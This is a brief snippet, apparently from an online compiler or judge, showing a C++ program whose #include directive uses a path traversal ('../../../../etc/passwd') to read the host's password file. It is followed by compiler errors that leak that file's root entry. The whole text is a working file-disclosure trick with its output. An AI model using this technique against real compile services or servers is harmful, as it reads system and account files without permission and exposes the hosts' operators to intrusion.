#include "../../../../../../../../../../etc/passwd" int main() { return 0; }
Standard input is empty
In file included from prog.cpp:1:0:
../../../../../../../../../../etc/passwd:1:5: error: found ':' in nested-name-specifier, expected '::'
root:x:0:0:root:/root:/bin/bash
^
../../../../../../../../../../etc/passwd:1:1: error: 'root' does not name a type
root:x:0:0:root:/root:/bin/bash
^
Standard output is empty